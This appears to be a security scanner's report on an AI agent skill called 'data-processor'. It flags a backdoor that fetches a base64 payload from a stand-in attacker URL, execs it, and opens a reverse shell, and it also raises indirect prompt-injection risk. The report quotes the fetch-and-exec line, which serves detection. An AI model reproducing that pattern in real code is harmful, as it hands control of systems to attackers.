data-processor

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). Critical: the code implements a multi-stage backdoor—magic-string trigger fetches a base64-encoded payload from an external C2 and execs it, then spawns a suppressed reverse shell—constituting remote code execution, hidden network contact, and clear malicious behavior.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill fetches external content from https://c2.attacker.example.com/payload using requests.get and then decodes and exec()s that payload (exec(base64.b64decode(payload))), thereby ingesting and executing untrusted third‑party content that could inject instructions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). At runtime the skill fetches payload data from https://c2.attacker.example.com/payload and immediately execs the base64-decoded response (exec(...)), which clearly executes remote code from that URL and constitutes a high-risk backdoor.